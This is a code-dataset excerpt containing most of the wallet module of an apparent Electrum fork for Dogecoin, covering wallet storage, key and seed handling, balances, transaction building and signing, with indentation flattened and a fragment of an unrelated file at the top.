return os.path.normcase(rPath(os.path.join(os.path.dirname(__file__), filename)))
def get_free_port():
from _pydev_bundle.pydev_localhost import get_socket_name
return get_socket_name(close=True)[1]
| epl-1.0 |
testalt/electrum-dgc | lib/wallet.py | 1 | 59368 | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 thomasv@gitorious
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import sys
import os
import hashlib
import ast
import threading
import random
import time
import math
import json
import copy
from util import print_msg, print_error
from bitcoin import *
from account import *
from version import *
from transaction import Transaction
from plugins import run_hook
import bitcoin
from synchronizer import WalletSynchronizer
from mnemonic import Mnemonic
# internal ID for imported account
IMPORTED_ACCOUNT = '/x'
class WalletStorage(object):
def __init__(self, config):
self.lock = threading.RLock()
self.config = config
self.data = {}
self.file_exists = False
self.path = self.init_path(config)
print_error( "wallet path", self.path )
if self.path:
self.read(self.path)
def init_path(self, config):
"""Set the path of the wallet."""
# command line -w option
path = config.get('wallet_path')
if path:
return path
# path in config file
path = config.get('default_wallet_path')
if path:
return path
# default path
dirpath = os.path.join(config.path, "wallets")
if not os.path.exists(dirpath):
os.mkdir(dirpath)
new_path = os.path.join(config.path, "wallets", "default_wallet")
# default path in pre 1.9 versions
old_path = os.path.join(config.path, "electrum-dgc.dat")
if os.path.exists(old_path) and not os.path.exists(new_path):
os.rename(old_path, new_path)
return new_path
def read(self, path):
"""Read the contents of the wallet file."""
try:
with open(self.path, "r") as f:
data = f.read()
except IOError:
return
try:
self.data = json.loads(data)
except:
try:
d = ast.literal_eval(data) #parse raw data from reading wallet file
except Exception:
raise IOError("Cannot read wallet file.")
self.data = {}
for key, value in d.items():
try:
json.dumps(key)
json.dumps(value)
except:
continue
self.data[key] = value
self.file_exists = True
def get(self, key, default=None):
with self.lock:
v = self.data.get(key)
if v is None:
v = default
else:
v = copy.deepcopy(v)
return v
def put(self, key, value, save = True):
try:
json.dumps(key)
json.dumps(value)
except:
print_error("json error: cannot save", key)
return
with self.lock:
if value is not None:
self.data[key] = copy.deepcopy(value)
elif key in self.data:
self.data.pop(key)
if save:
self.write()
def write(self):
s = json.dumps(self.data, indent=4, sort_keys=True)
f = open(self.path,"w")
f.write(s)
f.close()
if 'ANDROID_DATA' not in os.environ:
import stat
os.chmod(self.path,stat.S_IREAD | stat.S_IWRITE)
class Abstract_Wallet(object):
"""
Wallet classes are created to handle various address generation methods.
Completion states (watching-only, single account, no seed, etc) are handled inside classes.
"""
def __init__(self, storage):
self.storage = storage
self.electrum_version = ELECTRUM_VERSION
self.gap_limit_for_change = 3 # constant
# saved fields
self.seed_version = storage.get('seed_version', NEW_SEED_VERSION)
self.use_change = storage.get('use_change',True)
self.use_encryption = storage.get('use_encryption', False)
self.seed = storage.get('seed', '') # encrypted
self.labels = storage.get('labels', {})
self.frozen_addresses = storage.get('frozen_addresses',[])
self.addressbook = storage.get('contacts', [])
self.history = storage.get('addr_history',{}) # address -> list(txid, height)
self.fee_per_kb = int(storage.get('fee_per_kb', RECOMMENDED_FEE))
# This attribute is set when wallet.start_threads is called.
self.synchronizer = None
# imported_keys is deprecated. The GUI should call convert_imported_keys
self.imported_keys = self.storage.get('imported_keys',{})
self.load_accounts()
self.load_transactions()
# not saved
self.prevout_values = {} # my own transaction outputs
self.spent_outputs = []
# spv
self.verifier = None
# there is a difference between wallet.up_to_date and interface.is_up_to_date()
# interface.is_up_to_date() returns true when all requests have been answered and processed
# wallet.up_to_date is true when the wallet is synchronized (stronger requirement)
self.up_to_date = False
self.lock = threading.Lock()
self.transaction_lock = threading.Lock()
self.tx_event = threading.Event()
for tx_hash, tx in self.transactions.items():
self.update_tx_outputs(tx_hash)
# save wallet type the first time
if self.storage.get('wallet_type') is None:
self.storage.put('wallet_type', self.wallet_type, True)
def load_transactions(self):
self.transactions = {}
tx_list = self.storage.get('transactions',{})
for k, raw in tx_list.items():
try:
tx = Transaction.deserialize(raw)
except Exception:
print_msg("Warning: Cannot deserialize transactions. skipping")
continue
self.add_pubkey_addresses(tx)
self.transactions[k] = tx
for h,tx in self.transactions.items():
if not self.check_new_tx(h, tx):
print_error("removing unreferenced tx", h)
self.transactions.pop(h)
def add_pubkey_addresses(self, tx):
# find the address corresponding to pay-to-pubkey inputs
h = tx.hash()
# inputs
tx.add_pubkey_addresses(self.transactions)
# outputs of tx: inputs of tx2
for type, x, v in tx.outputs:
if type == 'pubkey':
for tx2 in self.transactions.values():
tx2.add_pubkey_addresses({h:tx})
def get_action(self):
pass
def convert_imported_keys(self, password):
for k, v in self.imported_keys.items():
sec = pw_decode(v, password)
pubkey = public_key_from_private_key(sec)
address = public_key_to_bc_address(pubkey.decode('hex'))
assert address == k
self.import_key(sec, password)
self.imported_keys.pop(k)
self.storage.put('imported_keys', self.imported_keys)
def load_accounts(self):
self.accounts = {}
d = self.storage.get('accounts', {})
for k, v in d.items():
if self.wallet_type == 'old' and k in [0, '0']:
v['mpk'] = self.storage.get('master_public_key')
self.accounts[k] = OldAccount(v)
elif v.get('imported'):
self.accounts[k] = ImportedAccount(v)
elif v.get('xpub3'):
self.accounts[k] = BIP32_Account_2of3(v)
elif v.get('xpub2'):
self.accounts[k] = BIP32_Account_2of2(v)
elif v.get('xpub'):
self.accounts[k] = BIP32_Account(v)
elif v.get('pending'):
self.accounts[k] = PendingAccount(v)
else:
print_error("cannot load account", v)
def synchronize(self):
pass
def can_create_accounts(self):
return False
def set_up_to_date(self,b):
with self.lock: self.up_to_date = b
def is_up_to_date(self):
with self.lock: return self.up_to_date
def update(self):
self.up_to_date = False
while not self.is_up_to_date():
time.sleep(0.1)
def is_imported(self, addr):
account = self.accounts.get(IMPORTED_ACCOUNT)
if account:
return addr in account.get_addresses(0)
else:
return False
def has_imported_keys(self):
account = self.accounts.get(IMPORTED_ACCOUNT)
return account is not None
def import_key(self, sec, password):
try:
pubkey = public_key_from_private_key(sec)
address = public_key_to_bc_address(pubkey.decode('hex'))
except Exception:
raise Exception('Invalid private key')
if self.is_mine(address):
raise Exception('Address already in wallet')
if self.accounts.get(IMPORTED_ACCOUNT) is None:
self.accounts[IMPORTED_ACCOUNT] = ImportedAccount({'imported':{}})
self.accounts[IMPORTED_ACCOUNT].add(address, pubkey, sec, password)
self.save_accounts()
if self.synchronizer:
self.synchronizer.add(address)
return address
def delete_imported_key(self, addr):
account = self.accounts[IMPORTED_ACCOUNT]
account.remove(addr)
if not account.get_addresses(0):
self.accounts.pop(IMPORTED_ACCOUNT)
self.save_accounts()
def set_label(self, name, text = None):
changed = False
old_text = self.labels.get(name)
if text:
if old_text != text:
self.labels[name] = text
changed = True
else:
if old_text:
self.labels.pop(name)
changed = True
if changed:
self.storage.put('labels', self.labels, True)
run_hook('set_label', name, text, changed)
return changed
def addresses(self, include_change = True):
o = []
for a in self.accounts.keys():
o += self.get_account_addresses(a, include_change)
return o
def is_mine(self, address):
return address in self.addresses(True)
def is_change(self, address):
if not self.is_mine(address): return False
acct, s = self.get_address_index(address)
if s is None: return False
return s[0] == 1
def get_address_index(self, address):
for account in self.accounts.keys():
for for_change in [0,1]:
addresses = self.accounts[account].get_addresses(for_change)
for addr in addresses:
if address == addr:
return account, (for_change, addresses.index(addr))
raise Exception("Address not found", address)
def get_private_key(self, address, password):
if self.is_watching_only():
return []
account_id, sequence = self.get_address_index(address)
return self.accounts[account_id].get_private_key(sequence, self, password)
def get_public_keys(self, address):
account_id, sequence = self.get_address_index(address)
return self.accounts[account_id].get_pubkeys(*sequence)
def add_keypairs(self, tx, keypairs, password):
if self.is_watching_only():
return
self.check_password(password)
addr_list, xpub_list = tx.inputs_to_sign()
for addr in addr_list:
if self.is_mine(addr):
private_keys = self.get_private_key(addr, password)
for sec in private_keys:
pubkey = public_key_from_private_key(sec)
keypairs[ pubkey ] = sec
for xpub, sequence in xpub_list:
# look for account that can sign
for k, account in self.accounts.items():
if xpub in account.get_master_pubkeys():
break
else:
continue
pk = account.get_private_key(sequence, self, password)
for sec in pk:
pubkey = public_key_from_private_key(sec)
keypairs[pubkey] = sec
def signrawtransaction(self, tx, private_keys, password):
# check that the password is correct. This will raise if it's not.
self.check_password(password)
# build a list of public/private keys
keypairs = {}
# add private keys from parameter
for sec in private_keys:
pubkey = public_key_from_private_key(sec)
keypairs[ pubkey ] = sec
# add private_keys
self.add_keypairs(tx, keypairs, password)
# sign the transaction
self.sign_transaction(tx, keypairs, password)
def sign_message(self, address, message, password):
keys = self.get_private_key(address, password)
assert len(keys) == 1
sec = keys[0]
key = regenerate_key(sec)
compressed = is_compressed(sec)
return key.sign_message(message, compressed, address)
def decrypt_message(self, pubkey, message, password):
address = public_key_to_bc_address(pubkey.decode('hex'))
keys = self.get_private_key(address, password)
secret = keys[0]
ec = regenerate_key(secret)
decrypted = ec.decrypt_message(message)
return decrypted
def is_found(self):
return self.history.values() != [[]] * len(self.history)
def add_contact(self, address, label=None):
self.addressbook.append(address)
self.storage.put('contacts', self.addressbook, True)
if label:
self.set_label(address, label)
def delete_contact(self, addr):
if addr in self.addressbook:
self.addressbook.remove(addr)
self.storage.put('addressbook', self.addressbook, True)
def fill_addressbook(self):
for tx_hash, tx in self.transactions.items():
is_relevant, is_send, _, _ = self.get_tx_value(tx)
if is_send:
for addr in tx.get_output_addresses():
if not self.is_mine(addr) and addr not in self.addressbook:
self.addressbook.append(addr)
# redo labels
# self.update_tx_labels()
def get_num_tx(self, address):
n = 0
for tx in self.transactions.values():
if address in tx.get_output_addresses(): n += 1
return n
def get_tx_value(self, tx, account=None):
domain = self.get_account_addresses(account)
return tx.get_value(domain, self.prevout_values)
def update_tx_outputs(self, tx_hash):
tx = self.transactions.get(tx_hash)
for i, (addr, value) in enumerate(tx.get_outputs()):
key = tx_hash+ ':%d'%i
self.prevout_values[key] = value
for item in tx.inputs:
if self.is_mine(item.get('address')):
key = item['prevout_hash'] + ':%d'%item['prevout_n']
self.spent_outputs.append(key)
def get_addr_balance(self, address):
#assert self.is_mine(address)
h = self.history.get(address,[])
if h == ['*']: return 0,0
c = u = 0
received_coins = [] # list of coins received at address
for tx_hash, tx_height in h:
tx = self.transactions.get(tx_hash)
if not tx: continue
for i, (addr, value) in enumerate(tx.get_outputs()):
if addr == address:
key = tx_hash + ':%d'%i
received_coins.append(key)
for tx_hash, tx_height in h:
tx = self.transactions.get(tx_hash)
if not tx: continue
v = 0
for item in tx.inputs:
addr = item.get('address')
if addr == address:
key = item['prevout_hash'] + ':%d'%item['prevout_n']
value = self.prevout_values.get( key )
if key in received_coins:
v -= value
for i, (addr, value) in enumerate(tx.get_outputs()):
key = tx_hash + ':%d'%i
if addr == address:
v += value
if tx_height:
c += v
else:
u += v
return c, u
def get_account_name(self, k):
return self.labels.get(k, self.accounts[k].get_name(k))
def get_account_names(self):
account_names = {}
for k in self.accounts.keys():
account_names[k] = self.get_account_name(k)
return account_names
def get_account_addresses(self, a, include_change=True):
if a is None:
o = self.addresses(include_change)
elif a in self.accounts:
ac = self.accounts[a]
o = ac.get_addresses(0)
if include_change: o += ac.get_addresses(1)
return o
def get_account_balance(self, account):
return self.get_balance(self.get_account_addresses(account))
def get_frozen_balance(self):
return self.get_balance(self.frozen_addresses)
def get_balance(self, domain=None):
if domain is None: domain = self.addresses(True)
cc = uu = 0
for addr in domain:
c, u = self.get_addr_balance(addr)
cc += c
uu += u
return cc, uu
def get_unspent_coins(self, domain=None):
coins = []
if domain is None: domain = self.addresses(True)
for addr in domain:
h = self.history.get(addr, [])
if h == ['*']: continue
for tx_hash, tx_height in h:
tx = self.transactions.get(tx_hash)
if tx is None: raise Exception("Wallet not synchronized")
is_coinbase = tx.inputs[0].get('prevout_hash') == '0'*64
for i, (address, value) in enumerate(tx.get_outputs()):
output = {'address':address, 'value':value, 'prevout_n':i}
if address != addr: continue
key = tx_hash + ":%d"%i
if key in self.spent_outputs: continue
output['prevout_hash'] = tx_hash
output['height'] = tx_height
output['coinbase'] = is_coinbase
coins.append((tx_height, output))
# sort by age
if coins:
coins = sorted(coins)
if coins[-1][0] != 0:
while coins[0][0] == 0:
coins = coins[1:] + [ coins[0] ]
return [x[1] for x in coins]
def set_fee(self, fee):
if self.fee_per_kb != fee:
self.fee_per_kb = fee
self.storage.put('fee_per_kb', self.fee_per_kb, True)
def get_history(self, address):
with self.lock:
return self.history.get(address)
def get_status(self, h):
if not h: return None
if h == ['*']: return '*'
status = ''
for tx_hash, height in h:
status += tx_hash + ':%d:' % height
return hashlib.sha256( status ).digest().encode('hex')
def receive_tx_callback(self, tx_hash, tx, tx_height):
with self.transaction_lock:
self.add_pubkey_addresses(tx)
if not self.check_new_tx(tx_hash, tx):
# may happen due to pruning
print_error("received transaction that is no longer referenced in history", tx_hash)
return
self.transactions[tx_hash] = tx
self.network.pending_transactions_for_notifications.append(tx)
self.save_transactions()
if self.verifier and tx_height>0:
self.verifier.add(tx_hash, tx_height)
self.update_tx_outputs(tx_hash)
def save_transactions(self):
tx = {}
for k,v in self.transactions.items():
tx[k] = str(v)
self.storage.put('transactions', tx, True)
def receive_history_callback(self, addr, hist):
if not self.check_new_history(addr, hist):
raise Exception("error: received history for %s is not consistent with known transactions"%addr)
with self.lock:
self.history[addr] = hist
self.storage.put('addr_history', self.history, True)
if hist != ['*']:
for tx_hash, tx_height in hist:
if tx_height>0:
# add it in case it was previously unconfirmed
if self.verifier: self.verifier.add(tx_hash, tx_height)
def get_tx_history(self, account=None):
if not self.verifier:
return []
with self.transaction_lock:
history = self.transactions.items()
history.sort(key = lambda x: self.verifier.get_txpos(x[0]))
result = []
balance = 0
for tx_hash, tx in history:
is_relevant, is_mine, v, fee = self.get_tx_value(tx, account)
if v is not None: balance += v
c, u = self.get_account_balance(account)
if balance != c+u:
result.append( ('', 1000, 0, c+u-balance, None, c+u-balance, None ) )
balance = c + u - balance
for tx_hash, tx in history:
is_relevant, is_mine, value, fee = self.get_tx_value(tx, account)
if not is_relevant:
continue
if value is not None:
balance += value
conf, timestamp = self.verifier.get_confirmations(tx_hash) if self.verifier else (None, None)
result.append( (tx_hash, conf, is_mine, value, fee, balance, timestamp) )
return result
def get_label(self, tx_hash):
label = self.labels.get(tx_hash)
is_default = (label == '') or (label is None)
if is_default: label = self.get_default_label(tx_hash)
return label, is_default
def get_default_label(self, tx_hash):
tx = self.transactions.get(tx_hash)
default_label = ''
if tx:
is_relevant, is_mine, _, _ = self.get_tx_value(tx)
if is_mine:
for o_addr in tx.get_output_addresses():
if not self.is_mine(o_addr):
try:
default_label = self.labels[o_addr]
except KeyError:
default_label = '>' + o_addr
break
else:
default_label = '(internal)'
else:
for o_addr in tx.get_output_addresses():
if self.is_mine(o_addr) and not self.is_change(o_addr):
break
else:
for o_addr in tx.get_output_addresses():
if self.is_mine(o_addr):
break
else:
o_addr = None
if o_addr:
try:
default_label = self.labels[o_addr]
except KeyError:
default_label = '<' + o_addr
return default_label
def get_tx_fee(self, tx):
# this method can be overloaded
return tx.get_fee()
def estimated_fee(self, tx):
estimated_size = len(tx.serialize(-1))/2
fee = int(self.fee_per_kb*estimated_size/1000.)
if fee < MIN_RELAY_TX_FEE: # and tx.requires_fee(self.verifier):
fee = MIN_RELAY_TX_FEE
return fee
def make_unsigned_transaction(self, outputs, fixed_fee=None, change_addr=None, domain=None, coins=None ):
# check outputs
for type, data, value in outputs:
if type == 'op_return':
assert len(data) < 41, "string too long"
#assert value == 0
if type == 'address':
assert is_address(data), "Address " + data + " is invalid!"
# get coins
if not coins:
if domain is None:
domain = self.addresses(True)
for i in self.frozen_addresses:
if i in domain: domain.remove(i)
coins = self.get_unspent_coins(domain)
amount = sum( map(lambda x:x[2], outputs) )
total = fee = 0
inputs = []
tx = Transaction(inputs, outputs)
for item in coins:
if item.get('coinbase') and item.get('height') + COINBASE_MATURITY > self.network.get_local_height():
continue
v = item.get('value')
total += v
self.add_input_info(item)
tx.add_input(item)
fee = fixed_fee if fixed_fee is not None else self.estimated_fee(tx)
if total >= amount + fee: break
else:
print_error("Not enough funds", total, amount, fee)
return None
# change address
if not change_addr:
# send change to one of the accounts involved in the tx
address = inputs[0].get('address')
account, _ = self.get_address_index(address)
if not self.use_change or account == IMPORTED_ACCOUNT:
change_addr = address
else:
change_addr = self.accounts[account].get_addresses(1)[-self.gap_limit_for_change]
# if change is above dust threshold, add a change output.
change_amount = total - ( amount + fee )
if fixed_fee is not None and change_amount > 0:
# Insert the change output at a random position in the outputs
posn = random.randint(0, len(tx.outputs))
tx.outputs[posn:posn] = [( 'address', change_addr, change_amount)]
elif change_amount > DUST_THRESHOLD:
# Insert the change output at a random position in the outputs
posn = random.randint(0, len(tx.outputs))
tx.outputs[posn:posn] = [( 'address', change_addr, change_amount)]
# recompute fee including change output
fee = self.estimated_fee(tx)
# remove change output
tx.outputs.pop(posn)
# if change is still above dust threshold, re-add change output.
change_amount = total - ( amount + fee )
if change_amount > DUST_THRESHOLD:
tx.outputs[posn:posn] = [( 'address', change_addr, change_amount)]
print_error('change', change_amount)
else:
print_error('not keeping dust', change_amount)
else:
print_error('not keeping dust', change_amount)
run_hook('make_unsigned_transaction', tx)
return tx
def mktx(self, outputs, password, fee=None, change_addr=None, domain= None, coins = None ):
tx = self.make_unsigned_transaction(outputs, fee, change_addr, domain, coins)
keypairs = {}
self.add_keypairs(tx, keypairs, password)
if keypairs:
self.sign_transaction(tx, keypairs, password)
return tx
def add_input_info(self, txin):
address = txin['address']
account_id, sequence = self.get_address_index(address)
account = self.accounts[account_id]
redeemScript = account.redeem_script(*sequence)
pubkeys = account.get_pubkeys(*sequence)
x_pubkeys = account.get_xpubkeys(*sequence)
# sort pubkeys and x_pubkeys, using the order of pubkeys
pubkeys, x_pubkeys = zip( *sorted(zip(pubkeys, x_pubkeys)))
txin['pubkeys'] = list(pubkeys)
txin['x_pubkeys'] = list(x_pubkeys)
txin['signatures'] = [None] * len(pubkeys)
if redeemScript:
txin['redeemScript'] = redeemScript
txin['num_sig'] = 2
else:
txin['redeemPubkey'] = account.get_pubkey(*sequence)
txin['num_sig'] = 1
def sign_transaction(self, tx, keypairs, password):
tx.sign(keypairs)
run_hook('sign_transaction', tx, password)
def sendtx(self, tx):
# synchronous
h = self.send_tx(tx)
self.tx_event.wait()
return self.receive_tx(h, tx)
def send_tx(self, tx):
# asynchronous
self.tx_event.clear()
self.network.send([('blockchain.transaction.broadcast', [str(tx)])], self.on_broadcast)
return tx.hash()
def on_broadcast(self, r):
self.tx_result = r.get('result')
self.tx_event.set()
def receive_tx(self, tx_hash, tx):
out = self.tx_result
if out != tx_hash:
return False, "error: " + out
run_hook('receive_tx', tx, self)
return True, out
def update_password(self, old_password, new_password):
if new_password == '':
new_password = None
if self.has_seed():
decoded = self.get_seed(old_password)
self.seed = pw_encode( decoded, new_password)
self.storage.put('seed', self.seed, True)
imported_account = self.accounts.get(IMPORTED_ACCOUNT)
if imported_account:
imported_account.update_password(old_password, new_password)
self.save_accounts()
if hasattr(self, 'master_private_keys'):
for k, v in self.master_private_keys.items():
b = pw_decode(v, old_password)
c = pw_encode(b, new_password)
self.master_private_keys[k] = c
self.storage.put('master_private_keys', self.master_private_keys, True)
self.use_encryption = (new_password != None)
self.storage.put('use_encryption', self.use_encryption,True)
def freeze(self,addr):
if self.is_mine(addr) and addr not in self.frozen_addresses:
self.frozen_addresses.append(addr)
self.storage.put('frozen_addresses', self.frozen_addresses, True)
return True
else:
return False
def unfreeze(self,addr):
if self.is_mine(addr) and addr in self.frozen_addresses:
self.frozen_addresses.remove(addr)
self.storage.put('frozen_addresses', self.frozen_addresses, True)
return True
else:
return False
def set_verifier(self, verifier):
self.verifier = verifier
# review transactions that are in the history
for addr, hist in self.history.items():
if hist == ['*']: continue
for tx_hash, tx_height in hist:
if tx_height>0:
# add it in case it was previously unconfirmed
self.verifier.add(tx_hash, tx_height)
# if we are on a pruning server, remove unverified transactions
vr = self.verifier.transactions.keys() + self.verifier.verified_tx.keys()
for tx_hash in self.transactions.keys():
if tx_hash not in vr:
self.transactions.pop(tx_hash)
def check_new_history(self, addr, hist):
# check that all tx in hist are relevant
if hist != ['*']:
for tx_hash, height in hist:
tx = self.transactions.get(tx_hash)
if not tx: continue
if not tx.has_address(addr):
return False
# check that we are not "orphaning" a transaction
old_hist = self.history.get(addr,[])
if old_hist == ['*']: return True
for tx_hash, height in old_hist:
if tx_hash in map(lambda x:x[0], hist): continue
found = False
for _addr, _hist in self.history.items():
if _addr == addr: continue
if _hist == ['*']: continue
_tx_hist = map(lambda x:x[0], _hist)
if tx_hash in _tx_hist:
found = True
break
if not found:
tx = self.transactions.get(tx_hash)
# tx might not be there
if not tx: continue
# already verified?
if self.verifier.get_height(tx_hash):
continue
# unconfirmed tx
print_error("new history is orphaning transaction:", tx_hash)
# check that all outputs are not mine, request histories
ext_requests = []
for _addr in tx.get_output_addresses():
# assert not self.is_mine(_addr)
ext_requests.append( ('blockchain.address.get_history', [_addr]) )
ext_h = self.network.synchronous_get(ext_requests)
print_error("sync:", ext_requests, ext_h)
height = None
for h in ext_h:
if h == ['*']: continue
for item in h:
if item.get('tx_hash') == tx_hash:
height = item.get('height')
if height:
print_error("found height for", tx_hash, height)
self.verifier.add(tx_hash, height)
else:
print_error("removing orphaned tx from history", tx_hash)
self.transactions.pop(tx_hash)
return True
def check_new_tx(self, tx_hash, tx):
# 1 check that tx is referenced in addr_history.
addresses = []
for addr, hist in self.history.items():
if hist == ['*']:continue
for txh, height in hist:
if txh == tx_hash:
addresses.append(addr)
if not addresses:
return False
# 2 check that referencing addresses are in the tx
for addr in addresses:
if not tx.has_address(addr):
return False
return True
def start_threads(self, network):
from verifier import TxVerifier
self.network = network
if self.network is not None:
self.verifier = TxVerifier(self.network, self.storage)
self.verifier.start()
self.set_verifier(self.verifier)
self.synchronizer = WalletSynchronizer(self, network)
self.synchronizer.start()
else:
self.verifier = None
self.synchronizer =None
def stop_threads(self):
if self.network:
self.verifier.stop()
self.synchronizer.stop()
def restore(self, cb):
pass
def get_accounts(self):
return self.accounts
def add_account(self, account_id, account):
self.accounts[account_id] = account
self.save_accounts()
def save_accounts(self):
d = {}
for k, v in self.accounts.items():
d[k] = v.dump()
self.storage.put('accounts', d, True)
def can_import(self):
return not self.is_watching_only()
def can_export(self):
return not self.is_watching_only()
def is_used(self, address):
h = self.history.get(address,[])
c, u = self.get_addr_balance(address)
return len(h), len(h) > 0 and c == -u
def address_is_old(self, address, age_limit=2):
age = -1
h = self.history.get(address, [])
if h == ['*']:
return True
for tx_hash, tx_height in h:
if tx_height == 0:
tx_age = 0
else:
tx_age = self.network.get_local_height() - tx_height + 1
if tx_age > age:
age = tx_age
return age > age_limit
def can_sign(self, tx):
pass
def is_watching_only(self):
False
def can_change_password(self):
return not self.is_watching_only()
class Imported_Wallet(Abstract_Wallet):
wallet_type = 'imported'
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
a = self.accounts.get(IMPORTED_ACCOUNT)
if not a:
self.accounts[IMPORTED_ACCOUNT] = ImportedAccount({'imported':{}})
def is_watching_only(self):
acc = self.accounts[IMPORTED_ACCOUNT]
n = acc.keypairs.values()
return n == [(None, None)] * len(n)
def has_seed(self):
return False
def is_deterministic(self):
return False
def check_password(self, password):
self.accounts[IMPORTED_ACCOUNT].get_private_key((0,0), self, password)
def is_used(self, address):
h = self.history.get(address,[])
return len(h), False
def get_master_public_keys(self):
return {}
def is_beyond_limit(self, address, account, is_change):
return False
class Deterministic_Wallet(Abstract_Wallet):
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
def has_seed(self):
return self.seed != ''
def is_deterministic(self):
return True
def is_watching_only(self):
return not self.has_seed()
def add_seed(self, seed, password):
if self.seed:
raise Exception("a seed exists")
self.seed_version, self.seed = self.format_seed(seed)
if password:
self.seed = pw_encode( self.seed, password)
self.use_encryption = True
else:
self.use_encryption = False
self.storage.put('seed', self.seed, True)
self.storage.put('seed_version', self.seed_version, True)
self.storage.put('use_encryption', self.use_encryption,True)
def get_seed(self, password):
return pw_decode(self.seed, password)
def get_mnemonic(self, password):
return self.get_seed(password)
def change_gap_limit(self, value):
if value >= self.gap_limit:
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit, True)
#self.interface.poke('synchronizer')
return True
elif value >= self.min_acceptable_gap():
for key, account in self.accounts.items():
addresses = account[0]
k = self.num_unused_trailing_addresses(addresses)
n = len(addresses) - k + value
addresses = addresses[0:n]
self.accounts[key][0] = addresses
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit, True)
self.save_accounts()
return True
else:
return False
def num_unused_trailing_addresses(self, addresses):
k = 0
for a in addresses[::-1]:
if self.history.get(a):break
k = k + 1
return k
def min_acceptable_gap(self):
# fixme: this assumes wallet is synchronized
n = 0
nmax = 0
for account in self.accounts.values():
addresses = account.get_addresses(0)
k = self.num_unused_trailing_addresses(addresses)
for a in addresses[0:-k]:
if self.history.get(a):
n = 0
else:
n += 1
if n > nmax: nmax = n
return nmax + 1
def default_account(self):
return self.accounts['0']
def create_new_address(self, account=None, for_change=0):
if account is None:
account = self.default_account()
address = account.create_new_address(for_change)
self.add_address(address)
return address
def add_address(self, address):
if address not in self.history:
self.history[address] = []
if self.synchronizer:
self.synchronizer.add(address)
self.save_accounts()
def synchronize(self):
for account in self.accounts.values():
account.synchronize(self)
def restore(self, callback):
from i18n import _
def wait_for_wallet():
self.set_up_to_date(False)
while not self.is_up_to_date():
msg = "%s\n%s %d"%(
_("Please wait..."),
_("Addresses generated:"),
len(self.addresses(True)))
apply(callback, (msg,))
time.sleep(0.1)
def wait_for_network():
while not self.network.is_connected():
msg = "%s \n" % (_("Connecting..."))
apply(callback, (msg,))
time.sleep(0.1)
# wait until we are connected, because the user might have selected another server
if self.network:
wait_for_network()
wait_for_wallet()
else:
self.synchronize()
self.fill_addressbook()
def is_beyond_limit(self, address, account, is_change):
if type(account) == ImportedAccount:
return False
addr_list = account.get_addresses(is_change)
i = addr_list.index(address)
prev_addresses = addr_list[:max(0, i)]
limit = self.gap_limit_for_change if is_change else self.gap_limit
if len(prev_addresses) < limit:
return False
prev_addresses = prev_addresses[max(0, i - limit):]
for addr in prev_addresses:
if self.history.get(addr):
return False
return True
def get_action(self):
if not self.get_master_public_key():
return 'create_seed'
if not self.accounts:
return 'create_accounts'
def get_master_public_keys(self):
out = {}
for k, account in self.accounts.items():
name = self.get_account_name(k)
mpk_text = '\n\n'.join( account.get_master_pubkeys() )
out[name] = mpk_text
return out
class BIP32_Wallet(Deterministic_Wallet):
# abstract class, bip32 logic
gap_limit = 20
def __init__(self, storage):
Deterministic_Wallet.__init__(self, storage)
self.master_public_keys = storage.get('master_public_keys', {})
self.master_private_keys = storage.get('master_private_keys', {})
def is_watching_only(self):
return not bool(self.master_private_keys)
def get_master_public_key(self):
return self.master_public_keys.get(self.root_name)
def get_master_private_key(self, account, password):
k = self.master_private_keys.get(account)
if not k: return
xprv = pw_decode(k, password)
return xprv
def check_password(self, password):
xpriv = self.get_master_private_key(self.root_name, password)
xpub = self.master_public_keys[self.root_name]
assert deserialize_xkey(xpriv)[3] == deserialize_xkey(xpub)[3]
def add_master_public_key(self, name, xpub):
self.master_public_keys[name] = xpub
self.storage.put('master_public_keys', self.master_public_keys, True)
def add_master_private_key(self, name, xpriv, password):
self.master_private_keys[name] = pw_encode(xpriv, password)
self.storage.put('master_private_keys', self.master_private_keys, True)
def derive_xkeys(self, root, derivation, password):
x = self.master_private_keys[root]
root_xprv = pw_decode(x, password)
xprv, xpub = bip32_private_derivation(root_xprv, root, derivation)
return xpub, xprv
def can_sign(self, tx):
if self.is_watching_only():
return False
if tx.is_complete():
return False
addr_list, xpub_list = tx.inputs_to_sign()
for addr in addr_list:
if self.is_mine(addr):
return True
mpk = [ self.master_public_keys[k] for k in self.master_private_keys.keys() ]
for xpub, sequence in xpub_list:
if xpub in mpk:
return True
return False
def create_master_keys(self, password):
seed = self.get_seed(password)
self.add_cosigner_seed(seed, self.root_name, password)
def add_cosigner_seed(self, seed, name, password):
# we don't store the seed, only the master xpriv
xprv, xpub = bip32_root(self.mnemonic_to_seed(seed,''))
xprv, xpub = bip32_private_derivation(xprv, "m/", self.root_derivation)
self.add_master_public_key(name, xpub)
self.add_master_private_key(name, xprv, password)
def add_cosigner_xpub(self, seed, name):
# store only master xpub
xprv, xpub = bip32_root(self.mnemonic_to_seed(seed,''))
xprv, xpub = bip32_private_derivation(xprv, "m/", self.root_derivation)
self.add_master_public_key(name, xpub)
def mnemonic_to_seed(self, seed, password):
return Mnemonic.mnemonic_to_seed(seed, password)
def make_seed(self):
lang = self.storage.config.get('language')
return Mnemonic(lang).make_seed()
def format_seed(self, seed):
return NEW_SEED_VERSION, ' '.join(seed.split())
class BIP32_Simple_Wallet(BIP32_Wallet):
# Wallet with a single BIP32 account, no seed
# gap limit 20
root_name = 'x/'
wallet_type = 'xpub'
def create_xprv_wallet(self, xprv, password):
xpub = bitcoin.xpub_from_xprv(xprv)
account = BIP32_Account({'xpub':xpub})
self.storage.put('seed_version', self.seed_version, True)
self.add_master_private_key(self.root_name, xprv, password)
self.add_master_public_key(self.root_name, xpub)
self.add_account('0', account)
def create_xpub_wallet(self, xpub):
account = BIP32_Account({'xpub':xpub})
self.storage.put('seed_version', self.seed_version, True)
self.add_master_public_key(self.root_name, xpub)
self.add_account('0', account)
